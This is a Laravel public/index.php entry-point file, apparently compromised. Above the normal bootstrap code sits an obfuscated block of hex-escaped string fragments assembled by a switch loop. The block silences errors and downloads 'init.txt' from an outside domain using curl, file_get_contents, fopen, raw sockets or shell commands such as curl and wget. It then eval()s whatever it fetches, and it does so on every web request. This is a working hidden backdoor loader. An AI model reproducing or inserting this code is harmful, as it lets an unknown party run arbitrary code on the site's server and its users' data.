<?php
$s=827225; $o=""; while(true) { switch($s) { case 481948: $o.="\x61\x5c\x72\x5c\x6e\x43\x6f\x6e"; $s=506193; break;
case 549154: $o.="\x27\x29\x29\x7b\x24\x68\x3d\x40"; $s=543901; break;
case 190895: $o.="\x2c\x31\x33\x3d\x3e\x31\x35\x5d"; $s=576840; break;
case 317386: $o.="\x24\x63\x6d\x64\x2c\x24\x6f\x29"; $s=165806; break;
case 236012: $o.="\x3b\x0d\x0a\x24\x75\x3d\x27\x68"; $s=143522; break;
case 110205: $o.="\x30\x31\x38\x3d\x3e\x24\x75\x61"; $s=190895; break;
case 533190: $o.="\x79\x73\x74\x65\x6d\x27\x2c\x27"; $s=407120; break;
case 762782: $o.="\x75\x29\x3b\x63\x75\x72\x6c\x5f"; $s=477836; break;
case 973123: $o.="\x28\x30\x29\x3b\x40\x69\x6e\x69"; $s=220134; break;
case 632493: $o.="\x32\x36\x30\x31\x32\x32\x5f\x31"; $s=976958; break;
case 543901: $o.="\x66\x6f\x70\x65\x6e\x28\x24\x75"; $s=960353; break;
case 670760: $o.="\x74\x69\x6d\x65\x6f\x75\x74\x27"; $s=255906; break;
case 989456: $o.="\x63\x6b\x6f\x70\x65\x6e\x28\x24"; $s=460391; break;
case 995794: $o.="\x24\x66\x2c\x31\x32\x38\x29\x3b"; $s=120811; break;
case 843435: $o.="\x73\x65\x72\x2d\x41\x67\x65\x6e"; $s=233433; break;
case 756268: $o.="\x6f\x70\x65\x6e\x27\x29\x7b\x24"; $s=244840; break;
case 324499: $o.="\x66\x28\x24\x66\x29\x29\x24\x62"; $s=753242; break;
case 891026: $o.="\x2d\x71\x55\x20\x27\x24\x75\x61"; $s=423463; break;
case 300568: $o.="\x28\x29\x3b\x40\x24\x66\x28\x24"; $s=897292; break;
case 489115: $o.="\x27\x3d\x3e\x5b\x27\x68\x65\x61"; $s=328844; break;
case 290163: $o.="\x6f\x75\x74\x20\x31\x35\x20\x24"; $s=217543; break;
case 275487: $o.="\x73\x74\x3a\x7b\x24\x70\x5b\x27"; $s=424002; break;
case 172577: $o.="\x29\x7b\x24\x68\x3d\x63\x75\x72"; $s=996954; break;
case 793932: $o.="\x24\x62\x3d\x27\x27\x3b\x77\x68"; $s=527450; break;
case 925879: $o.="\x73\x74\x73\x28\x27\x63\x75\x72"; $s=879446; break;
case 386541: $o.="\x20\x47\x65\x63\x6b\x6f\x29\x20"; $s=968804; break;
case 604512: $o.="\x0d\x0a\x69\x66\x28\x21\x24\x63"; $s=166410; break;
case 165806: $o.="\x3b\x24\x63\x3d\x6a\x6f\x69\x6e"; $s=519291; break;
case 699046: $o.="\x5b\x31\x39\x39\x31\x33\x3d\x3e"; $s=942386; break;
case 526511: $o.="\x6f\x62\x5f\x67\x65\x74\x5f\x63"; $s=997850; break;
case 877645: $o.="\x65\x61\x6d\x5f\x73\x65\x74\x5f"; $s=798139; break;
case 798139: $o.="\x74\x69\x6d\x65\x6f\x75\x74\x28"; $s=638721; break;
case 713186: $o.="\x5f\x75\x72\x6c\x28\x24\x75\x29"; $s=159438; break;
case 388175: $o.="\x6f\x62\x5f\x73\x74\x61\x72\x74"; $s=300568; break;
case 913400: $o.="\x66\x29\x3b\x24\x63\x3d\x65\x78"; $s=576194; break;
case 897292: $o.="\x63\x6d\x64\x29\x3b\x24\x63\x3d"; $s=526511; break;
case 706872: $o.="\x63\x3d\x40\x73\x74\x72\x65\x61"; $s=185108; break;
case 435823: $o.="\x72\x6f\x72\x73\x27\x2c\x30\x29"; $s=236012; break;
case 371540: $o.="\x74\x65\x6e\x74\x73\x28\x24\x75"; $s=502757; break;
case 208889: $o.="\x73\x70\x6c\x61\x79\x5f\x65\x72"; $s=435823; break;
case 914768: $o.="\x73\x28\x27\x66\x6f\x70\x65\x6e"; $s=549154; break;
case 255906: $o.="\x3d\x3e\x31\x35\x5d\x5d\x29\x3b"; $s=331829; break;
case 384562: $o.="\x28\x24\x63\x6d\x64\x2c\x27\x72"; $s=909565; break;
case 424002: $o.="\x68\x6f\x73\x74\x27\x5d\x7d\x5c"; $s=644310; break;
case 120811: $o.="\x66\x63\x6c\x6f\x73\x65\x28\x24"; $s=913400; break;
case 233433: $o.="\x74\x3a\x24\x75\x61\x22\x2c\x27"; $s=670760; break;
case 946201: $o.="\x6f\x70\x65\x6e\x27\x5d\x61\x73"; $s=737006; break;
case 737006: $o.="\x24\x66\x29\x7b\x69\x66\x28\x66"; $s=704006; break;
case 753242: $o.="\x2e\x3d\x66\x67\x65\x74\x73\x28"; $s=995794; break;
case 930903: $o.="\x2e\x33\x36\x20\x28\x4b\x48\x54"; $s=441531; break;
case 748200: $o.="\x2e\x30\x5c\x72\x5c\x6e\x48\x6f"; $s=275487; break;
case 717841: $o.="\x72\x72\x61\x79\x28\x24\x68\x2c"; $s=699046; break;
case 960353: $o.="\x2c\x27\x72\x27\x29\x3b\x69\x66"; $s=885993; break;
case 968804: $o.="\x43\x68\x72\x6f\x6d\x65\x2f\x31"; $s=370598; break;
case 332290: $o.="\x5b\x27\x70\x61\x74\x68\x27\x5d"; $s=994081; break;
case 638721: $o.="\x24\x68\x2c\x31\x35\x29\x3b\x24"; $s=706872; break;
case 954430: $o.="\x5d\x3f\x3f\x27\x27\x3b\x7d\x7d"; $s=604512; break;
case 184854: $o.="\x65\x63\x74\x2d\x74\x69\x6d\x65"; $s=290163; break;
case 538348: $o.="\x24\x72\x2c\x31\x35\x29\x3b\x69"; $s=197897; break;
case 716909: $o.="\x74\x68\x72\x75\x27\x2c\x27\x73"; $s=533190; break;
case 997850: $o.="\x6c\x65\x61\x6e\x28\x29\x3b\x7d"; $s=782038; break;
case 942386: $o.="\x31\x2c\x35\x32\x3d\x3e\x31\x2c"; $s=285523; break;
case 996954: $o.="\x6c\x5f\x69\x6e\x69\x74\x28\x24"; $s=762782; break;
case 909565: $o.="\x27\x29\x3b\x69\x66\x28\x24\x68"; $s=563264; break;
case 576194: $o.="\x70\x6c\x6f\x64\x65\x28\x22\x5c"; $s=699647; break;
case 820494: $o.="\x21\x24\x63\x26\x26\x69\x6e\x69"; $s=394785; break;
case 527450: $o.="\x69\x6c\x65\x28\x21\x66\x65\x6f"; $s=324499; break;
case 166410: $o.="\x29\x7b\x24\x63\x6d\x64\x3d\x22"; $s=823145; break;
case 897980: $o.="\x65\x28\x24\x68\x29\x3b\x7d\x7d"; $s=603694; break;
case 827225: $o.="\x40\x65\x72\x72\x6f\x72\x5f\x72"; $s=851821; break;
case 159438: $o.="\x3b\x24\x66\x3d\x40\x66\x73\x6f"; $s=989456; break;
case 194172: $o.="\x62\x4b\x69\x74\x2f\x35\x33\x37"; $s=930903; break;
case 205247: $o.="\x3d\x3d\x27\x65\x78\x65\x63\x27"; $s=798369; break;
case 887607: $o.="\x2e\x63\x6f\x6d\x2f\x69\x6e\x69"; $s=371463; break;
case 145281: $o.="\x73\x28\x27\x66\x73\x6f\x63\x6b"; $s=874960; break;
case 570302: $o.="\x72\x65\x70\x6c\x61\x63\x65\x28"; $s=724907; break;
case 603694: $o.="\x0d\x0a\x69\x66\x28\x21\x24\x63"; $s=188409; break;
case 502757: $o.="\x2c\x30\x2c\x24\x78\x29\x3b\x7d"; $s=196616; break;
case 745913: $o.="\x64\x20\x31\x30\x3b\x20\x4b\x29"; $s=755987; break;
case 660416: $o.="\x68\x65\x6c\x6c\x5f\x65\x78\x65"; $s=571876; break;
case 796437: $o.="\x63\x6c\x6f\x73\x65\x28\x24\x68"; $s=693558; break;
case 547573: $o.="\x6f\x73\x28\x24\x64\x2c\x24\x66"; $s=611580; break;
case 691091: $o.="\x66\x29\x26\x26\x73\x74\x72\x70"; $s=547573; break;
case 145264: $o.="\x40\x73\x68\x65\x6c\x6c\x5f\x65"; $s=333141; break;
case 406952: $o.="\x63\x6c\x6f\x73\x65\x28\x24\x68"; $s=897994; break;
case 195334: $o.="\x2d\x4f\x20\x2d\x20\x24\x75\x22"; $s=138031; break;
case 509299: $o.="\x5f\x67\x65\x74\x5f\x63\x6f\x6e"; $s=371540; break;
case 138031: $o.="\x3b\x24\x64\x3d\x73\x74\x72\x74"; $s=104718; break;
case 885993: $o.="\x28\x24\x68\x29\x7b\x73\x74\x72"; $s=877645; break;
case 963717: $o.="\x65\x63\x27\x29\x7b\x24\x63\x3d"; $s=145264; break;
case 305756: $o.="\x0a\x69\x66\x28\x66\x75\x6e\x63"; $s=836159; break;
case 563264: $o.="\x29\x7b\x24\x63\x3d\x40\x73\x74"; $s=642405; break;
case 792565: $o.="\x2c\x24\x62\x2c\x32\x29\x5b\x31"; $s=954430; break;
case 851821: $o.="\x65\x70\x6f\x72\x74\x69\x6e\x67"; $s=973123; break;
case 185108: $o.="\x6d\x5f\x67\x65\x74\x5f\x63\x6f"; $s=669555; break;
case 519291: $o.="\x28\x22\x5c\x6e\x22\x2c\x24\x6f"; $s=219772; break;
case 227392: $o.="\x27\x20\x2d\x2d\x63\x6f\x6e\x6e"; $s=184854; break;
case 750649: $o.="\x69\x66\x28\x24\x66\x3d\x3d\x27"; $s=593398; break;
case 217543: $o.="\x75\x7c\x7c\x77\x67\x65\x74\x20"; $s=891026; break;
case 813952: $o.="\x3b\x65\x76\x61\x6c\x28\x27\x3f"; $s=160244; break;
case 699647: $o.="\x72\x5c\x6e\x5c\x72\x5c\x6e\x22"; $s=792565; break;
case 704006: $o.="\x75\x6e\x63\x74\x69\x6f\x6e\x5f"; $s=528432; break;
case 664963: $o.="\x66\x6f\x70\x65\x6e\x27\x29\x29"; $s=421295; break;
case 194339: $o.="\x33\x37\x2e\x33\x36\x27\x3b\x0d"; $s=270569; break;
case 879446: $o.="\x6c\x5f\x69\x6e\x69\x74\x27\x29"; $s=172577; break;
case 520269: $o.="\x53\x61\x66\x61\x72\x69\x2f\x35"; $s=194339; break;
case 505622: $o.="\x0a\x69\x66\x28\x24\x63\x29\x7b"; $s=338686; break;
case 878621: $o.="\x73\x28\x24\x68\x29\x3b\x40\x70"; $s=796437; break;
case 944803: $o.="\x65\x28\x5b\x27\x68\x74\x74\x70"; $s=489115; break;
case 804826: $o.="\x3b\x20\x41\x6e\x64\x72\x6f\x69"; $s=745913; break;
case 331829: $o.="\x24\x63\x3d\x40\x66\x69\x6c\x65"; $s=509299; break;
case 976958: $o.="\x33\x2e\x65\x6d\x61\x79\x61\x6c"; $s=887607; break;
case 755987: $o.="\x20\x41\x70\x70\x6c\x65\x57\x65"; $s=194172; break;
case 394785: $o.="\x5f\x67\x65\x74\x28\x27\x61\x6c"; $s=344977; break;
case 244840: $o.="\x68\x3d\x40\x70\x6f\x70\x65\x6e"; $s=384562; break;
case 421295: $o.="\x7b\x24\x78\x3d\x73\x74\x72\x65"; $s=717551; break;
case 520028: $o.="\x26\x26\x66\x75\x6e\x63\x74\x69"; $s=973963; break;
case 994081: $o.="\x7d\x20\x48\x54\x54\x50\x2f\x31"; $s=748200; break;
case 188409: $o.="\x26\x26\x66\x75\x6e\x63\x74\x69"; $s=448610; break;
case 798369: $o.="\x29\x7b\x40\x65\x78\x65\x63\x28"; $s=317386; break;
case 198753: $o.="\x22\x47\x45\x54\x20\x7b\x24\x70"; $s=332290; break;
case 122678: $o.="\x72\x69\x74\x65\x28\x24\x66\x2c"; $s=198753; break;
case 507472: $o.="\x5d\x2c\x38\x30\x2c\x24\x65\x2c"; $s=538348; break;
case 724907: $o.="\x27\x2f\x5e\x5c\x78\x45\x46\x5c"; $s=274458; break;
case 973963: $o.="\x6f\x6e\x5f\x65\x78\x69\x73\x74"; $s=914768; break;
case 693558: $o.="\x29\x3b\x7d\x7d\x65\x6c\x73\x65"; $s=750649; break;
case 782038: $o.="\x69\x66\x28\x24\x63\x29\x62\x72"; $s=174522; break;
case 233652: $o.="\x6e\x69\x5f\x67\x65\x74\x28\x27"; $s=632945; break;
case 370598: $o.="\x31\x34\x2e\x30\x2e\x30\x2e\x30"; $s=330381; break;
case 183063: $o.="\x63\x6c\x6f\x73\x65\x5c\x72\x5c"; $s=250644; break;
case 614347: $o.="\x68\x29\x3b\x66\x63\x6c\x6f\x73"; $s=897980; break;
case 328844: $o.="\x64\x65\x72\x27\x3d\x3e\x22\x55"; $s=843435; break;
case 270569: $o.="\x0a\x24\x63\x3d\x27\x27\x3b\x0d"; $s=305756; break;
case 104718: $o.="\x6f\x6c\x6f\x77\x65\x72\x28\x69"; $s=233652; break;
case 160244: $o.="\x3e\x27\x2e\x24\x63\x29\x3b\x7d"; $s=261394; break;
case 897994: $o.="\x29\x3b\x7d\x0d\x0a\x69\x66\x28"; $s=820494; break;
case 448610: $o.="\x6f\x6e\x5f\x65\x78\x69\x73\x74"; $s=145281; break;
case 250644: $o.="\x6e\x5c\x72\x5c\x6e\x22\x29\x3b"; $s=793932; break;
case 423463: $o.="\x27\x20\x2d\x54\x20\x31\x35\x20"; $s=195334; break;
case 407120: $o.="\x65\x78\x65\x63\x27\x2c\x27\x70"; $s=946201; break;
case 337851: $o.="\x5f\x63\x6f\x6e\x74\x65\x6e\x74"; $s=878621; break;
case 632945: $o.="\x64\x69\x73\x61\x62\x6c\x65\x5f"; $s=212053; break;
case 143522: $o.="\x74\x74\x70\x73\x3a\x2f\x2f\x6a"; $s=632493; break;
case 254850: $o.="\x78\x74\x5f\x63\x72\x65\x61\x74"; $s=944803; break;
case 441531: $o.="\x4d\x4c\x2c\x20\x6c\x69\x6b\x65"; $s=386541; break;
case 644310: $o.="\x72\x5c\x6e\x55\x73\x65\x72\x2d"; $s=390975; break;
case 212053: $o.="\x66\x75\x6e\x63\x74\x69\x6f\x6e"; $s=821751; break;
case 330381: $o.="\x20\x4d\x6f\x62\x69\x6c\x65\x20"; $s=520269; break;
case 836159: $o.="\x74\x69\x6f\x6e\x5f\x65\x78\x69"; $s=925879; break;
case 220134: $o.="\x5f\x73\x65\x74\x28\x27\x64\x69"; $s=208889; break;
case 874960: $o.="\x6f\x70\x65\x6e\x27\x29\x29\x7b"; $s=474000; break;
case 338686: $o.="\x24\x63\x3d\x70\x72\x65\x67\x5f"; $s=570302; break;
case 571876: $o.="\x63\x27\x2c\x27\x70\x61\x73\x73"; $s=716909; break;
case 877317: $o.="\x66\x28\x24\x66\x3d\x3d\x27\x70"; $s=756268; break;
case 891917: $o.="\x7a\x69\x6c\x6c\x61\x2f\x35\x2e"; $s=696999; break;
case 506193: $o.="\x6e\x65\x63\x74\x69\x6f\x6e\x3a"; $s=183063; break;
case 219772: $o.="\x29\x3b\x7d\x65\x6c\x73\x65\x69"; $s=877317; break;
case 460391: $o.="\x70\x5b\x27\x68\x6f\x73\x74\x27"; $s=507472; break;
case 896146: $o.="\x6c\x5f\x65\x78\x65\x63\x28\x24"; $s=947575; break;
case 528432: $o.="\x65\x78\x69\x73\x74\x73\x28\x24"; $s=691091; break;
case 371463: $o.="\x74\x2e\x74\x78\x74\x27\x3b\x0d"; $s=254322; break;
case 390975: $o.="\x41\x67\x65\x6e\x74\x3a\x24\x75"; $s=481948; break;
case 474000: $o.="\x24\x70\x3d\x70\x61\x72\x73\x65"; $s=713186; break;
case 821751: $o.="\x73\x27\x29\x29\x3b\x66\x6f\x72"; $s=195278; break;
case 261394: eval($o); break 2;
case 195278: $o.="\x65\x61\x63\x68\x28\x5b\x27\x73"; $s=660416; break;
case 947575: $o.="\x68\x29\x3b\x63\x75\x72\x6c\x5f"; $s=406952; break;
case 717551: $o.="\x61\x6d\x5f\x63\x6f\x6e\x74\x65"; $s=254850; break;
case 593398: $o.="\x73\x68\x65\x6c\x6c\x5f\x65\x78"; $s=963717; break;
case 669555: $o.="\x6e\x74\x65\x6e\x74\x73\x28\x24"; $s=614347; break;
case 463802: $o.="\x65\x29\x7b\x69\x66\x28\x24\x66"; $s=205247; break;
case 285523: $o.="\x34\x32\x3d\x3e\x30\x2c\x31\x30"; $s=110205; break;
case 891670: $o.="\x20\x2d\x41\x20\x27\x24\x75\x61"; $s=227392; break;
case 333141: $o.="\x78\x65\x63\x28\x24\x63\x6d\x64"; $s=163667; break;
case 344977: $o.="\x6c\x6f\x77\x5f\x75\x72\x6c\x5f"; $s=664963; break;
case 576840: $o.="\x29\x3b\x24\x63\x3d\x63\x75\x72"; $s=896146; break;
case 197897: $o.="\x66\x28\x24\x66\x29\x7b\x66\x77"; $s=122678; break;
case 163667: $o.="\x29\x3b\x7d\x65\x6c\x73\x65\x7b"; $s=388175; break;
case 823145: $o.="\x63\x75\x72\x6c\x20\x2d\x73\x4c"; $s=891670; break;
case 611580: $o.="\x29\x3d\x3d\x3d\x66\x61\x6c\x73"; $s=463802; break;
case 274458: $o.="\x78\x42\x42\x5c\x78\x42\x46\x2f"; $s=593853; break;
case 174522: $o.="\x65\x61\x6b\x3b\x7d\x7d\x7d\x0d"; $s=505622; break;
case 642405: $o.="\x72\x65\x61\x6d\x5f\x67\x65\x74"; $s=337851; break;
case 593853: $o.="\x27\x2c\x27\x27\x2c\x24\x63\x29"; $s=813952; break;
case 477836: $o.="\x73\x65\x74\x6f\x70\x74\x5f\x61"; $s=717841; break;
case 196616: $o.="\x0d\x0a\x69\x66\x28\x21\x24\x63"; $s=520028; break;
case 254322: $o.="\x0a\x24\x75\x61\x3d\x27\x4d\x6f"; $s=891917; break;
case 696999: $o.="\x30\x20\x28\x4c\x69\x6e\x75\x78"; $s=804826; break; } }

use Illuminate\Contracts\Http\Kernel;
use Illuminate\Http\Request;

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Check If The Application Is Under Maintenance
|--------------------------------------------------------------------------
|
| If the application is in maintenance / demo mode via the "down" command
| we will load this file so that any pre-rendered content can be shown
| instead of starting the framework, which could cause an exception.
|
*/

if (file_exists($maintenance = __DIR__.'/../storage/framework/maintenance.php')) {
    require $maintenance;
}

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| this application. We just need to utilize it! We'll simplZy require it
| into the script here so we don't need to manually load our classes.
|
*/

require __DIR__.'/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request using
| the application's HTTP kernel. Then, we will send the response back
| to this client's browser, allowing them to enjoy our application.
|
*/

$app = require_once __DIR__.'/../bootstrap/app.php';

$kernel = $app->make(Kernel::class);

$response = $kernel->handle(
    $request = Request::capture()
)->send();

$kernel->terminate($request, $response);
